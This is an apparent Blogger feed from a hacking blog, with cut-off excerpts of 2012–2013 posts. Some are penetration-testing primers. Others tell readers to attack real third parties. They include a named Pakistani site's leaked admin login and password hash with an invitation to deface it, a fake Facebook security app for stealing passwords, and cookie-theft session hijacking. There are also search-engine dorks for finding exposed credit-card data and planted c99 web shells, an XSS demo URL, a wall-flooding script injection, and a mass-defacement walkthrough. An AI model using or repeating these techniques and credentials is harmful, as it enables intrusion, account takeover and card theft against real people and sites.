tag:blogger.com,1999:blog-33463805323193628232024-03-23T03:57:36.200-07:00HACKAHOLIChacking is not just a crime its a survival trick...Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.comBlogger156125tag:blogger.com,1999:blog-3346380532319362823.post-56787326606191080352013-07-02T07:16:00.003-07:002013-07-02T07:16:37.562-07:00Topera- The IPv6 port scanner invisible to Snort IDS.
Topera is a brand new TCP port scanner under IPv6, with the particularity that these scans are not detected by Snort. Snort is the most known IDS/IPS and is widely used in many different critical environments. Some commercial tools (Juniper or Checkpoint ones) use it as detection engine also. Mocking snort detection capabilities could suppose a high risk in some cases. Fixed Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com17tag:blogger.com,1999:blog-3346380532319362823.post-54396147331964251612013-07-02T07:14:00.000-07:002013-07-02T07:14:05.297-07:00LIST OF BUG BOUNTY PROGRAMS/ HALL OF FAME PAYING SITES
LIST OF BUG BOUNTY PROGRAMS
Bug Bounty Program a well known topic is on the heat these days, known companies like: google, Facebook, Mozilla are paying for finding a vulnerabilities on their web servers, products, services or some associated applications. Here is a list for all the Security Researchers and Bug Hunters to target all the best :)
Bug Bounty Websites for Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com40tag:blogger.com,1999:blog-3346380532319362823.post-68991759474248581552012-10-05T01:06:00.002-07:002012-10-05T01:06:53.131-07:00Backtrack Wireless: Packet Sniffing and Injecting
Packet Sniffing and Packet Injecting
WLAN Frames:
Management frames: Management frames are responsible for maintainingcommunication between the access points and wireless clients.
Control frames: Control frames are responsible for ensuring a proper exchange ofdata between the access point and wireless clients.
Data frames: Data frames carry the actual data sent on the wireless network. Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com944tag:blogger.com,1999:blog-3346380532319362823.post-72562425528409587112012-10-05T01:04:00.000-07:002012-10-05T01:04:02.683-07:00Backtrack Penetration Testing: Exploitation
Medusa
Medusa is a log-in brute forcer that attempts to gain access to remote services by guessing at the user password. Medusa is capable of attacking a large number of remote services including FTP, HTTP, MySQL, Telnet, VNC, Web Form, and more. In order to use Medusa, you need several pieces of information including the target IP address, a username or username list that you are attempting Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com11tag:blogger.com,1999:blog-3346380532319362823.post-39410226528605358962012-10-05T01:03:00.001-07:002012-10-05T01:03:04.589-07:00Backtrack Penetration Testing: Scanning
Scanning
The scanning process can be divided into three steps:
Determining if a system is active.
Port scanning the system.
Scanning the system for vulnerabilities.
Step 1 is the process of determining whether a target system is turned on and capable of communicating or interacting with our machine. This step is the least reliable and we should always continue with steps 2 and 3 Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com8tag:blogger.com,1999:blog-3346380532319362823.post-79237314429874309002012-10-05T01:01:00.001-07:002012-10-05T01:01:26.453-07:00Backtrack Penetration Testing: Introduction
What is Penetration Testing?
Penetration testing is the legal and authorized attempt to exploit a computer system with the intent of making a network or system more secure. The process includes scanning systems looking for weak spots, and launching attacks and prove that the system is vulnerable to attack from a real hacker.
Penetration Testing has several names:
Pen Testing
EthicalZero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com5tag:blogger.com,1999:blog-3346380532319362823.post-37030294189842519702012-10-05T01:00:00.001-07:002012-10-05T01:00:09.547-07:00Backtrack Wireless: Introduction
Introduction:This is a multi-part tutorial that will show you the tools of wireless attacks and penetration testing.
Required Hardware:
Most of this isn’t really required, but will be helpful on your hacking adventures.
A laptop or two. One laptop will act as the penetration tester and the other will be the victim. Of course if you do not have two laptops you can use a desktop with Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com10tag:blogger.com,1999:blog-3346380532319362823.post-29318383548059994912012-10-05T00:58:00.003-07:002012-10-05T00:58:39.814-07:00Installing Backtrack
Tutorial 1: Installing Backtrack 5 to a Hard drive.Tutorial 2: Installing Backtrack 5 to a Virtual Machine.Tutorial 3: Installing Backtrack 5 via USB.
Installing Backtrack 5 to a Hard Drive
Head over to: http://www.backtrack-linux.org/downloads/ and download the BackTrack ISO and burn it to a bootable DVD or flash drive.-Registering is up to you, just click “download” to skip.
Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com17tag:blogger.com,1999:blog-3346380532319362823.post-33002664281548654672012-10-05T00:54:00.001-07:002012-10-05T00:55:04.564-07:00TWO KIDS WIN FACEBOOK BOUNTYZero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com5tag:blogger.com,1999:blog-3346380532319362823.post-34586049405741461342012-10-05T00:51:00.002-07:002012-10-05T00:51:49.938-07:00 International free SMS Works for all countries (without registration)
http://ezfreesms.com/ is a website that allows u to send free sms to anywhere on the globe and that too without registration
Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com3tag:blogger.com,1999:blog-3346380532319362823.post-43117372297909082682012-09-19T07:50:00.003-07:002012-09-19T08:06:16.871-07:00ptcl.com.pk hacked by Crash Override now
The famous website of pakistan ptcl.com.pk was hacked by Crash Override noobs can try entering the website and deface it
the admin logins are given below
Count(*) of ptcl.admins is 2
Data Found: =
Data Found: u_id=11
Data Found: u_login=admin_ptcldb
Data Found: u_name=admin_ptcldb
Data Found: u_pass=bff6b0a10009e7baf16f8f0dee9ab05b
Data Found: u_email=admin@ptcl.com
Data Found: Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com33tag:blogger.com,1999:blog-3346380532319362823.post-10787568033552961622012-09-09T09:07:00.001-07:002012-09-09T09:07:30.848-07:00PhpFox 3.0.1 Cross Site Scripting
Google Dork: Intext:"Powered By phpFox Version 3.0.1"
Vendor Home : http://www.phpfox.com/
There are lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title & ...
D3m0:
http://buddymahal.com//static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com82tag:blogger.com,1999:blog-3346380532319362823.post-51546872465418602342012-09-09T08:30:00.002-07:002012-09-09T09:09:34.304-07:00Get Access to Your Friends Email and Password Using The Dirty Facebook Application Trick
As you are already aware of my Facebook hacking application known as "New FB security utility" which convinces the users to save their accounts from hackers but in fact the are hacked.
This is a new , advanced and most reliable way of hacking facebook accounts. You cannot find such kind of application on the whole "WEB" . In other words you can say that I am the creator of this Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com5tag:blogger.com,1999:blog-3346380532319362823.post-61491898473690415832012-09-09T08:29:00.001-07:002012-09-09T09:09:01.849-07:00Hack a Gmail account using GX cookiesZero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com3tag:blogger.com,1999:blog-3346380532319362823.post-25915358047303564882012-09-09T08:26:00.002-07:002012-09-09T08:26:43.651-07:00Hack a Facebook account with cookie stealing or session hijacking
Description:In this article i am describing a way of hacking a Facebook account with wireshark (stealing your victim's cookies) also known as session hijackingThe cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com18tag:blogger.com,1999:blog-3346380532319362823.post-24171741817821297712012-06-14T11:08:00.001-07:002012-06-14T11:08:11.016-07:00Compress GB data into MB
Many times our hard disk runs out of space and we have to delete some data or the other for no reason. Even I used to face the problem sometime back in history and by doing some research on the topic, I actually found a working and an awesome way to save my hard disk space.
Many times our hard disk runs out of space and we have to delete some data or the other for no reason. Even Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com3tag:blogger.com,1999:blog-3346380532319362823.post-77790703671841001092012-06-14T11:03:00.002-07:002012-06-14T11:03:33.611-07:00Hacking Using Doxing -Doxing Complete Hacking Tutorial
I hope you read my last article about What is Doxing?. Let me explain more about Doxing in this article.Use of Doxing:
Hackers can track Innocent peoples data and hack their accounts.
Security Experts can trace the Hackers(can trace some innocent hackers only,N00bs). This will be helpful for solving Cyber Crime cases.
Definiton of Doxing:
Doxing is derived from Document Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com1tag:blogger.com,1999:blog-3346380532319362823.post-6682509528043925052012-06-14T11:02:00.000-07:002012-06-14T11:02:52.691-07:00VP-ASP SHOPPING CART 5.00 EXPLOIT | HACKING CREDIT CARD
Here is a small exploit to Hack & Steal Credit card info & many other data from a site .
Step By Step Guide :~#
Go to Google & type this Dork - intitle: VP-ASP Shopping Cart 5.00 l
After that the Target URL will look like - www.tcsprogramming.net/shopping/diag_dbtest.asp (Demo)
Then there you can see many details like xDatabase xDatabas LocationZero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com53tag:blogger.com,1999:blog-3346380532319362823.post-72857558778795004132012-06-14T11:00:00.003-07:002012-06-14T11:00:47.101-07:00SEND FREE SMS ALL OVER THE WORLD USING YOUR ANDROID PHONE
Hey guys its my first post here on sending free sms over world hope you all will like it :))
First of all you have to download app for your android mobile, Download it from below link (contains .apk file) .
[#] Download link: http://www.mediafire.com/?r5btwfc622b08yn
Now you have to install it in your Android Mobile .
Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com1tag:blogger.com,1999:blog-3346380532319362823.post-9661458842983276522012-06-14T10:57:00.001-07:002012-06-14T10:58:07.810-07:00FLOOD YOUR FACEBOOK FRIENDS WALL WITH MESSAGES.
Message Flooding is a art in which you can flood your facebook friends wall with messages. I will tell you how you can perform this trick by using Javascript. You just have to copy and paste the below mentioned javascript on the address bar when you have opened your friends wall whom you want to flood with messages.
Javascript-
Javascript:(a = (b = document).createElement("script"))Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com1tag:blogger.com,1999:blog-3346380532319362823.post-38839716903221077122012-06-14T10:56:00.004-07:002012-06-14T10:56:51.538-07:00GET AIRCEL WIFI FOR FREE
Step By Step Guide :
Go to your nearest Aircel Wi-Fi Zone or hotspot and simply turn on the Wi-Fi on your Cell Phone or Laptop.
Now you will have to click New User from the welcome screen.
You will be prompted to Enter all the details along with your Aircel Mobile Number , Enter all the details and wait for few minutes.
After few seconds you will recieve a new User IDZero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com2tag:blogger.com,1999:blog-3346380532319362823.post-9152380666215613612012-06-14T10:56:00.002-07:002012-06-14T11:10:51.170-07:00GOOGLE DORKS : BACKDOORED C99 (FIND ALREADY UPLOADED C99 SHELLS)
Following are is a google dorks which can be used to find already uploaded shells via Google.
Dork List :
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com2tag:blogger.com,1999:blog-3346380532319362823.post-90831874231082572732012-06-14T10:55:00.000-07:002012-06-14T10:55:01.306-07:00MASS DEFACE TUTORIAL
After my older posts of server rooting & server backdoor, today i will tell you how to mass deface in few steps .. so lets start .Things Required:
Rooted server
Mass deface script
Step By Step Guide :
First we have to download our mass deface file, so as usual we will use the wget function
Type: wget www.somesite.in/massdeface.zip
As Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com2tag:blogger.com,1999:blog-3346380532319362823.post-76133555358271453842012-06-14T10:53:00.000-07:002012-06-14T10:53:01.317-07:00Add Folder Background In Windows 7
Earlier i explained how to add folder background in XP, now using this software, you can add folderbackground in
Win7.
>>>DOWNLOAD FROM HERE<<<
Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com1tag:blogger.com,1999:blog-3346380532319362823.post-37473195646600256422012-06-14T10:51:00.000-07:002012-06-14T10:51:22.450-07:00ADMIN PAGE VULNERABILITY | HACKING CREDIT CARD PART 2
Here is the second part of Hacking Credit Card . Another easy & working Exploit .
Step By Step Guide :~#
Go to Google & type this Dork - inurl:\"/cart.php?m=\"
After that the Target URL will look like - http://www.facesbyfelicia.com/store/cart.php?m=view (Demo) .
Then now we will find the admin page & hack into the website so we Zero- Accesshttp://www.blogger.com/profile/10049158099558000391noreply@blogger.com2